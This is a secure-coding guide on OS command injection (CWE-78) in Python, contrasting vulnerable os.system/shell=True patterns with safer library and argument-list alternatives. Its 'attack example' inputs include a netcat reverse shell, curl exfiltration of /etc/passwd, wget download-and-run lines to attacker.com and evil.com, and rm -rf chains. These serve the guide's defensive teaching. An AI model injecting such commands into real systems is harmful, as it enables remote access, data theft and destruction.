CWE-78: OS Command Injection - Python
Overview
OS Command Injection occurs when an application incorporates untrusted data into an operating system command without proper validation or sanitization. Attackers can execute arbitrary commands on the host operating system.
Primary Defence: Use Python standard-library modules or maintained Python packages (pathlib, shutil, requests, zipfile, etc.) instead of system commands, or if unavoidable, use subprocess.run() with argument lists and shell=False. Avoid launching shell scripts or batch files with untrusted arguments; platform-specific shell parsing can reappear even when your Python code does not explicitly request a shell.
Remediation Strategy
PRIMARY FIX - Avoid System Calls
Use Python native libraries instead of executing commands
- This eliminates the vulnerability entirely
- Do NOT use subprocess or os.system() if a Python library exists
SECONDARY FIX - Use subprocess.run() with Argument List
Set shell=False, pass arguments as list
- WARNING: Only use if Priority 1 is not possible
- Must use list of arguments with
shell=False(CRITICAL)
Defense in Depth - Input Validation
Allowlist permitted characters
- Required in addition to Priority 1 or 2
- Never use validation alone
Additional Hardening - Least Privilege
Drop privileges, use resource limits
- Apply alongside other fixes
Decision Tree
Need to execute OS command?
├─ Is there a Python library alternative? (pathlib, shutil, requests, etc.)
│ ├─ YES → Use Python library (Priority 1) - PREFERRED SOLUTION
│ └─ NO → Continue
│
├─ Can you use subprocess.run() with argument list?
│ ├─ YES → Use subprocess.run(['cmd', 'arg1', 'arg2'], shell=False) (Priority 2)
│ └─ NO → Re-evaluate if command is truly necessary
│
└─ For ALL solutions:
├─ Add input validation (Priority 3)
└─ Apply least privilege (Priority 4)
Common Vulnerable Patterns
String Concatenation with os.system()
# VULNERABLE - Command injection via string concatenation
filename = request.GET['file']
os.system('ls -la ' + filename)
# Attack example:
# Input: "file.txt; rm -rf /tmp/*"
# Result: Deletes all files in /tmp
Why this is vulnerable: os.system() executes commands through the shell, allowing attackers to inject shell metacharacters like ;, |, &&, or $() to chain commands such as ; rm -rf / or | nc attacker.com 4444 -e /bin/sh, achieving arbitrary code execution.
Using subprocess with shell=True
# VULNERABLE - Shell command injection
user_input = request.GET['path']
subprocess.run(f'cat {user_input}', shell=True)
# Attack example:
# Input: "file.txt | curl attacker.com?data=$(cat /etc/passwd)"
# Result: Exfiltrates password file
subprocess.Popen with Shell Invocation
# VULNERABLE - Invoking shell allows command injection
ip = request.GET['ip']
subprocess.Popen(f'ping -c 4 {ip}', shell=True)
# Attack example:
# Input: "8.8.8.8 && cat /etc/shadow > /tmp/pwned"
# Result: Executes additional commands
Why this is vulnerable: subprocess.Popen with shell=True passes the command to the shell, allowing injection of shell operators like &&, ||, or ; to execute arbitrary commands such as && wget http://evil.com/backdoor.sh -O- | sh, creating backdoors or stealing data.
Unvalidated Input in subprocess.call()
# VULNERABLE - No input validation with shell=True
user_file = request.POST['filepath']
subprocess.call('grep pattern ' + user_file, shell=True)
# Attack example:
# Input: "data.txt; wget http://attacker.com/malware.sh -O /tmp/m.sh; python /tmp/m.sh"
# Result: Downloads and executes malware
Why this is vulnerable: subprocess.call() with shell=True and no validation allows attackers to inject shell metacharacters like ; to chain commands, download malicious scripts with wget or curl, and execute them, compromising the entire system.
Secure Patterns
Use Python Native Libraries (PREFERRED - Eliminates Command Injection)
# SECURE - Use pathlib and os modules instead of OS commands
from pathlib import Path
import os
directory = Path('/uploads')
for file_path in directory.iterdir():
stat = file_path.stat()
print(f"{file_path.name} {stat.st_size} {stat.st_mtime}")
# More file operations
import shutil
content = Path(filepath).read_text() # Instead of "cat"
shutil.copy(source, dest) # Instead of "cp"
Path(path).mkdir(parents=True, exist_ok=True) # Instead of "mkdir -p"
Path(filepath).unlink() # Instead of "rm"
Why this works: Python's pathlib and shutil modules operate directly on the filesystem through the Python runtime without invoking shell commands. This completely eliminates command injection vulnerabilities - there's no OS process to execute, no shell to interpret metacharacters like ;, |, or &&, and no possibility of command chaining. These functions are also more portable across operating systems than system commands.
Use requests Library for Network Operations
# SECURE - Use requests instead of wget/curl commands
import requests
response = requests.get(url, timeout=30)
content = response.content
# For downloads
with requests.get(url, stream=True, timeout=30) as r:
r.raise_for_status()
with open('download.file', 'wb') as f:
for chunk in r.iter_content(chunk_size=8192):
f.write(chunk)
Why this works: The requests library performs network operations through pure Python code without executing wget, curl, or other command-line utilities. By eliminating process execution entirely, there's no attack surface for command injection - malicious URLs or parameters cannot escape into shell commands because no shell is ever invoked. The timeout parameter also prevents denial of service through hanging connections.
Use tarfile/zipfile for Archives
# SECURE - Use tarfile extraction filters instead of tar commands
import tarfile
from pathlib import Path
with tarfile.open(archive, 'r:gz') as tar:
# Python 3.12+: data filter blocks absolute paths, outside-destination
# paths, dangerous links, and special files.
tar.extractall(path='./extracted', filter='data')
# For ZIP files
import zipfile
from pathlib import Path
destination = Path('./extracted').resolve()
with zipfile.ZipFile(archive, 'r') as zip_ref:
for member in zip_ref.namelist():
target = (destination / member).resolve()
if not target.is_relative_to(destination):
raise ValueError(f'Unsafe archive member: {member}')
if Path(member).is_absolute():
raise ValueError(f'Unsafe archive member: {member}')
zip_ref.extractall(destination)
Why this works: Python's tarfile and zipfile modules handle archive operations without calling external tar, unzip, or 7z commands, so archive names cannot become shell syntax. For tar archives, Python 3.12+ extraction filters provide the important safety boundary: filter='data' rejects absolute paths, entries that would extract outside the destination, dangerous hardlinks/symlinks, and special files. For zip archives, resolving each destination path and checking is_relative_to(destination) prevents zip-slip traversal even when paths contain nested .. components. These archive checks address filesystem escape risks; they are separate from command injection prevention.
For older Python versions without tar extraction filters, do not extract untrusted tar files unless you implement equivalent checks for paths, links, special files, file count, and extracted size. Even with filter='data', extract untrusted archives into a new temporary directory and apply resource limits to reduce denial-of-service risk.
Use re Module for Text Processing
# SECURE - Use re module instead of grep commands
import re
from pathlib import Path
content = Path(filepath).read_text()
matches = re.findall(pattern, content)
# Line-by-line processing
with open(filepath) as f:
matching_lines = [line for line in f if search_term in line]
Why this works: Python's re module and file I/O operations provide powerful text processing capabilities without executing grep, sed, awk, or other shell utilities. Processing text in-memory through Python prevents command injection while offering better performance, type safety, and cross-platform compatibility. List comprehensions and regex operations are also more maintainable than complex shell pipelines.
subprocess.run() with Argument List (If Process Execution Required)
WARNING: Avoid executing OS commands if at all possible. Python has native libraries for almost everything (requests, pathlib, zipfile, etc.). This pattern is ONLY for cases where no Python library exists (e.g., calling a legacy third-party binary). Always exhaust all native alternatives first.
# USE WITH CAUTION - When process execution is unavoidable, use argument list
import subprocess
import ipaddress
ip_address = request.GET['ip']
# Validate input first
try:
ipaddress.ip_address(ip_address)
except ValueError:
raise ValueError('Invalid IP address')
# Use list of arguments - NO SHELL
result = subprocess.run(
['ping', '-c', '4', ip_address], # Arguments as list
capture_output=True,
text=True,
shell=False, # CRITICAL: shell=False
timeout=10
)
print(result.stdout)
Why this works: Using subprocess.run() with arguments as a list and shell=False passes each argument directly to the executable without Python invoking /bin/sh or cmd.exe. Even if ip_address contains shell metacharacters like ; or &&, they are treated as literal argument data rather than command separators. Input validation provides defense-in-depth by rejecting malformed inputs before they reach subprocess. On Windows, avoid launching .bat or .cmd files with untrusted arguments; Python documents platform-specific cases where batch files may still be processed by a system shell.
subprocess.run() with Path Validation (For File Operations)
WARNING: Use Python's pathlib, shutil, or os modules instead of subprocess for file operations. Only use subprocess for operations with no Python equivalent (e.g., calling external compression tools).
For file operations requiring subprocess - always validate paths.
# AVOID IF POSSIBLE - Validate paths before use
filename = request.GET['file']
# Validate filename
if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
raise ValueError('Invalid filename')
# Better: Use pathlib instead of subprocess
base_dir = Path('/uploads').resolve()
file_path = (base_dir / filename).resolve()
if not file_path.is_relative_to(base_dir):
raise ValueError('Path traversal detected')
content = file_path.read_text()
Why this works: Using Path.resolve() and is_relative_to() ensures the resolved absolute path stays within the intended directory, preventing path traversal attacks through ../ sequences. The regex validation creates an allowlist of permitted filename characters, blocking shell metacharacters. However, the example emphasizes using pathlib's native file operations (read_text()) instead of subprocess entirely - this is the most secure approach because it avoids process execution altogether.
Input Validation (Defense in Depth)
Allowlist Validation
import re
def validate_filename(filename):
"""Only allow alphanumeric, underscore, dash, dot"""
if not re.match(r'^[a-zA-Z0-9._-]+$', filename):
raise ValueError('Invalid filename characters')
return filename
def validate_ip_address(ip):
"""Validate IPv4 format"""
import ipaddress
try:
ipaddress.IPv4Address(ip)
return ip
except ValueError:
raise ValueError('Invalid IP address')
Framework-Specific Guidance
Django/Flask Integration
# Django view with validation
import ipaddress
def ping_view(request):
ip_address = request.GET.get('ip', '')
try:
ipaddress.ip_address(ip_address)
except ValueError:
return HttpResponseBadRequest('Invalid IP')
# Safe to use with subprocess
result = subprocess.run(
['ping', '-c', '4', ip_address],
capture_output=True,
shell=False
)
return HttpResponse(result.stdout)
shlex for Argument Parsing (Use Carefully)
import shlex
import subprocess
# Only use shlex.split() for parsing TRUSTED input
# NOT for untrusted user input directly in commands
# Safe: parsing trusted command template
cmd_template = 'ping -c 4'
args = shlex.split(cmd_template)
args.append(validated_ip) # Append validated user input
subprocess.run(args, shell=False)
# NEVER do this:
# user_input = request.GET['cmd']
# args = shlex.split(user_input) # Still vulnerable!
# subprocess.run(args, shell=False)
Security Best Practices
Use Timeout
try:
result = subprocess.run(
['ping', '-c', '4', ip_address],
capture_output=True,
shell=False,
timeout=10 # Prevent hanging
)
except subprocess.TimeoutExpired:
# Handle timeout
pass
Limit Resource Usage
import resource
def limit_process_resources():
"""Limit CPU and memory for subprocess"""
def set_limits():
# Limit CPU time to 30 seconds
resource.setrlimit(resource.RLIMIT_CPU, (30, 30))
# Limit memory to 128MB
resource.setrlimit(resource.RLIMIT_AS, (128 * 1024 * 1024,
128 * 1024 * 1024))
return set_limits
# Use preexec_fn only in simple Unix subprocess launchers.
# In threaded web applications, prefer OS/container/cgroup limits or a worker wrapper.
subprocess.run(
['ping', '-c', '4', ip_address],
preexec_fn=limit_process_resources(),
shell=False
)
Drop Privileges (Unix)
import os
import pwd
def drop_privileges(username='nobody'):
"""Drop privileges to specified user"""
def set_user():
pw_record = pwd.getpwnam(username)
os.setgid(pw_record.pw_gid)
os.setuid(pw_record.pw_uid)
return set_user
# Run subprocess as unprivileged user
subprocess.run(
['command'],
preexec_fn=drop_privileges('nobody'),
shell=False
)
Deprecated/Dangerous Functions to Avoid
# NEVER USE THESE:
os.system(cmd) # Always uses shell
os.popen(cmd) # Uses shell; prefer subprocess without shell
commands.getoutput(cmd) # Removed in Python 3
subprocess.call(cmd, shell=True)
subprocess.Popen(cmd, shell=True)
# ALWAYS USE:
subprocess.run([...], shell=False)
subprocess.check_output([...], shell=False)
Remediation Steps
- Locate each command sink:
os.system(),os.popen(),subprocess.*withshell=True, string commands passed to subprocess, or wrappers that call these APIs. - Identify the operation being performed and replace it with a Python API when one exists, such as
pathlib,shutil,zipfile,tarfile,re, or a maintained network library. - If process execution is unavoidable, pass an argument list with
shell=False, set a timeout, and avoid batch or shell scripts for untrusted arguments. - Validate each argument using a type-specific parser such as
ipaddress,Pathresolution within an allowlisted base directory, or an allowlist for simple filenames. - Remove fallback paths that still construct command strings, including debug/admin paths and error-handling branches.
- Add operational hardening such as low-privilege users, container or OS resource limits, controlled working directories, and restricted environment variables.
Testing
- Test normal values for each argument, including valid filenames, paths, IP addresses, and URLs expected by the feature.
- Test shell metacharacters such as
;,&&,|, backticks,$(), redirects, quotes, and newlines. - Test argument injection values such as filenames beginning with
-or values that could become extra flags. - Test Windows and Unix behavior separately when the application is cross-platform, especially for
.bator.cmdlaunchers. - Verify invalid input fails before subprocess execution and returns a controlled error.
- Re-run static analysis tools such as Bandit and add regression tests around the wrapper or service function that launches processes.
Common Pitfalls
- Passing a list to
subprocess.run()but also settingshell=True. - Using
shlex.split()on untrusted user input and treating the result as safe. - Validating with a denylist of shell metacharacters while still invoking a shell.
- Using regex-only IP validation that accepts invalid addresses; use
ipaddressfor IP values. - Replacing a command injection bug with path traversal by passing unvalidated filenames into file operations.
- Relying on timeouts, dropped privileges, or resource limits as the primary fix instead of removing shell interpretation.
Dependencies and Installation
pathlib,shutil,subprocess,zipfile,tarfile,ipaddress, andreare in the Python standard library.requestsis a third-party package for HTTP operations; keep it current through the project's dependency manager.- Bandit can help detect dangerous subprocess patterns, but manual review is still needed to confirm whether data is untrusted and whether
shell=Trueor string commands are reachable.